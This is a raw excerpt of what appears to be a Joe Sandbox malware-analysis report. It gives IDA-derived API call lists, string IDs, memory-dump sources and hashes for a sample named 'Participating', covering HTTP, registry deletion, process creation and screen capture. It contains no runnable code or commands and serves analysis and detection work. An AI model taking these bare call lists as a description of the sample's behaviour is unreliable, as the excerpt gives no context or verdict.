                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                                                                                                                  • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                                                  • API String ID: 66158676-1714406822
                                                                                                                                                                                                                                                                  • Opcode ID: 1f1a2fb64b5f99b17ae8c53b161538ea3482ffc3fb3e7fd6bf6047f845927a59
                                                                                                                                                                                                                                                                  • Instruction ID: fe4ff0c8273567405cd09c1c7bf70df3de358a9f4be73d65f453c769ed7dabaa
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f1a2fb64b5f99b17ae8c53b161538ea3482ffc3fb3e7fd6bf6047f845927a59
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B21D136A44714BFD7106BA4AC0ABA93FA9EF45B61F540229F90DD37C0EF7098448AB5
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _wcslen
                                                                                                                                                                                                                                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                                                                                                                  • API String ID: 176396367-1603158881
                                                                                                                                                                                                                                                                  • Opcode ID: b48906b44ae42f1a7722ee9c643056e88ca6015d1283c6005f65c1cddca58105
                                                                                                                                                                                                                                                                  • Instruction ID: 096c19e81fa5b3006686e6877be44eaa3874fd17e4569d01b94d13547a30f5a9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b48906b44ae42f1a7722ee9c643056e88ca6015d1283c6005f65c1cddca58105
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ADE19232A00516DBCB189FB8C8817EEBBB5FF54710F184229E556E7250DB30DE9997B0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CharLowerBuffW.USER32(00000000,00000000,00D7DCD0), ref: 00D54F6C
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D54F80
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D54FDE
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D55039
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D55084
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D550EC
                                                                                                                                                                                                                                                                    • Part of subcall function 00CFFD52: _wcslen.LIBCMT ref: 00CFFD5D
                                                                                                                                                                                                                                                                  • GetDriveTypeW.KERNEL32(?,00DA7C10,00000061), ref: 00D55188
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                                                                  • API String ID: 2055661098-1000479233
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D6BBF8
                                                                                                                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00D6BC10
                                                                                                                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00D6BC34
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D6BC60
                                                                                                                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00D6BC74
                                                                                                                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00D6BC96
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D6BD92
                                                                                                                                                                                                                                                                    • Part of subcall function 00D50F4E: GetStdHandle.KERNEL32(000000F6), ref: 00D50F6D
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D6BDAB
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D6BDC6
                                                                                                                                                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00D6BE16
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 00D6BE67
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00D6BE99
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00D6BEAA
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00D6BEBC
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00D6BECE
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00D6BF43
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2178637699-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00D7DCD0), ref: 00D64B18
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00D64B2A
                                                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00D7DCD0), ref: 00D64B4F
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00D7DCD0), ref: 00D64B9B
                                                                                                                                                                                                                                                                  • StringFromGUID2.OLE32(?,?,00000028,?,00D7DCD0), ref: 00D64C05
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000009), ref: 00D64CBF
                                                                                                                                                                                                                                                                  • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00D64D25
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00D64D4F
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                                                                                                                                  • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                                                                                                                  • API String ID: 354098117-199464113
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetMenuItemCount.USER32(00DB29C0), ref: 00D23F72
                                                                                                                                                                                                                                                                  • GetMenuItemCount.USER32(00DB29C0), ref: 00D24022
                                                                                                                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 00D24066
                                                                                                                                                                                                                                                                  • SetForegroundWindow.USER32(00000000), ref: 00D2406F
                                                                                                                                                                                                                                                                  • TrackPopupMenuEx.USER32(00DB29C0,00000000,?,00000000,00000000,00000000), ref: 00D24082
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00D2408E
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                  • API String ID: 36266755-4108050209
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • DestroyWindow.USER32(00000000,?), ref: 00D77823
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE8577: _wcslen.LIBCMT ref: 00CE858A
                                                                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00D77897
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00D778B9
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00D778CC
                                                                                                                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 00D778ED
                                                                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00CE0000,00000000), ref: 00D7791C
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00D77935
                                                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 00D7794E
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00D77955
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00D7796D
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00D77985
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE2234: GetWindowLongW.USER32(?,000000EB), ref: 00CE2242
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                                                                                                                                                  • String ID: 0$tooltips_class32
                                                                                                                                                                                                                                                                  • API String ID: 2429346358-3619404913
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00CE24B0
                                                                                                                                                                                                                                                                  • DragQueryPoint.SHELL32(?,?), ref: 00D79BA3
                                                                                                                                                                                                                                                                    • Part of subcall function 00D780AE: ClientToScreen.USER32(?,?), ref: 00D780D4
                                                                                                                                                                                                                                                                    • Part of subcall function 00D780AE: GetWindowRect.USER32(?,?), ref: 00D7814A
                                                                                                                                                                                                                                                                    • Part of subcall function 00D780AE: PtInRect.USER32(?,?,?), ref: 00D7815A
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00D79C0C
                                                                                                                                                                                                                                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00D79C17
                                                                                                                                                                                                                                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00D79C3A
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00D79C81
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00D79C9A
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00D79CB1
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00D79CD3
                                                                                                                                                                                                                                                                  • DragFinish.SHELL32(?), ref: 00D79CDA
                                                                                                                                                                                                                                                                  • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00D79DCD
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                                                                                                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                                                                                                                  • API String ID: 221274066-3440237614
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00D5CEF5
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00D5CF08
                                                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00D5CF1C
                                                                                                                                                                                                                                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00D5CF35
                                                                                                                                                                                                                                                                  • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00D5CF78
                                                                                                                                                                                                                                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00D5CF8E
                                                                                                                                                                                                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D5CF99
                                                                                                                                                                                                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00D5CFC9
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00D5D021
                                                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00D5D035
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00D5D040
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3800310941-3916222277
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00D766D6,?,?), ref: 00D78FEE
                                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00D766D6,?,?,00000000,?), ref: 00D78FFE
                                                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00D766D6,?,?,00000000,?), ref: 00D79009
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00D766D6,?,?,00000000,?), ref: 00D79016
                                                                                                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00D79024
                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00D766D6,?,?,00000000,?), ref: 00D79033
                                                                                                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00D7903C
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00D766D6,?,?,00000000,?), ref: 00D79043
                                                                                                                                                                                                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00D766D6,?,?,00000000,?), ref: 00D79054
                                                                                                                                                                                                                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,00D80C04,?), ref: 00D7906D
                                                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00D7907D
                                                                                                                                                                                                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 00D7909D
                                                                                                                                                                                                                                                                  • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00D790CD
                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00D790F5
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00D7910B
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3840717409-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CEB329: _wcslen.LIBCMT ref: 00CEB333
                                                                                                                                                                                                                                                                    • Part of subcall function 00D6D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00D6C10E,?,?), ref: 00D6D415
                                                                                                                                                                                                                                                                    • Part of subcall function 00D6D3F8: _wcslen.LIBCMT ref: 00D6D451
                                                                                                                                                                                                                                                                    • Part of subcall function 00D6D3F8: _wcslen.LIBCMT ref: 00D6D4C8
                                                                                                                                                                                                                                                                    • Part of subcall function 00D6D3F8: _wcslen.LIBCMT ref: 00D6D4FE
                                                                                                                                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D6C154
                                                                                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00D6C1D2
                                                                                                                                                                                                                                                                  • RegDeleteValueW.ADVAPI32(?,?), ref: 00D6C26A
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00D6C2DE
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00D6C2FC
                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00D6C352
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00D6C364
                                                                                                                                                                                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00D6C382
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00D6C3E3
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00D6C3F4
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                                                                                                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                  • API String ID: 146587525-4033151799
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 00D63035
                                                                                                                                                                                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00D63045
                                                                                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 00D63051
                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00D6305E
                                                                                                                                                                                                                                                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00D630CA
                                                                                                                                                                                                                                                                  • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00D63109
                                                                                                                                                                                                                                                                  • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00D6312D
                                                                                                                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 00D63135
                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00D6313E
                                                                                                                                                                                                                                                                  • DeleteDC.GDI32(?), ref: 00D63145
                                                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 00D63150
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                                                                                                                  • String ID: (
                                                                                                                                                                                                                                                                  • API String ID: 2598888154-3887548279
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00CE24B0
                                                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000000F), ref: 00D7A990
                                                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000011), ref: 00D7A9A7
                                                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 00D7A9B3
                                                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000000F), ref: 00D7A9C9
                                                                                                                                                                                                                                                                  • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 00D7AC15
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00D7AC33
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00D7AC54
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(00000003,00000000), ref: 00D7AC73
                                                                                                                                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00D7AC95
                                                                                                                                                                                                                                                                  • DefDlgProcW.USER32(?,00000005,?), ref: 00D7ACBB
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                                  • API String ID: 3962739598-2766056989
                                                                                                                                                                                                                                                                  • Opcode ID: ea23b1e46ee37fc0d220a8bdc3f7a7bb32cf950f5b29496b4acc71bdb14d7422
                                                                                                                                                                                                                                                                  • Instruction ID: 0164a39917740572bd4cba6e12751e94accea865e345788ed2bbba8232de1721
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ea23b1e46ee37fc0d220a8bdc3f7a7bb32cf950f5b29496b4acc71bdb14d7422
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F1B16835600219EFDF15CF6CC9857AE7BB2FF84704F18C069ED49AA295E770A980CB61
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 00D452E6
                                                                                                                                                                                                                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 00D45328
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D45339
                                                                                                                                                                                                                                                                  • CharUpperBuffW.USER32(?,00000000), ref: 00D45345
                                                                                                                                                                                                                                                                  • _wcsstr.LIBVCRUNTIME ref: 00D4537A
